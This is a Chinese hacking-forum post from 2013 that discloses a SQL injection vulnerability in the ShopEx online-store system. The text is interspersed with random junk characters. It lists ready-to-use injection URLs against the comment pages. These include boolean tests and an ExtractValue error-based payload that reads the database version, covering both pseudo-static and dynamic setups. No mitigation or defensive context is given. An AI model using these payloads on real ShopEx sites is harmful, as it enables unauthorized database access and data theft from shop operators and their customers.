注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
! Z& ?3 f/ C- _( @5 g# E* i) o i* O8 u$ c
好吧,我扯远了~~. J! W$ t8 |2 F8 W6 J' R: I. a
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~0 z5 j1 i6 P3 ?; n! i0 f; v
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
/ w/ |) F6 ~" e! v. j' z$ R6 u$ L" L& C5 |- V
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html ; F0 r7 ^, }# `5 o7 y/ z4 c
1 ]9 A' P0 b j
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html & h e- `' u) L5 M
4 ?" b, a& V. }9 g2 l6 d, }http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
8 V( n3 }0 \! u" Y$ O6 q) J: r1 Q2 H
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
3 D: s' c& @1 G4 @4 ]& d
% \3 R" m6 P, F ' ~& Z4 Y* l6 I8 t/ k4 D
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
( `. H# G; m }. i. v! m如何注入就不多说了,10多年的东西了…不会也会了…
6 i# M$ V0 E; L8 p3 }8 g/ ?/ U
1 t* \- _. Q/ k2 T% e. c8 {0 Q7 t8 q
8 ?& ?, O6 t' I& q7 R
. f$ k- a# ~; V( X( ^
) J4 n. F! i( q" s: r1 q |
发表于 2013-2-19 08:31:27
收藏
支持
反对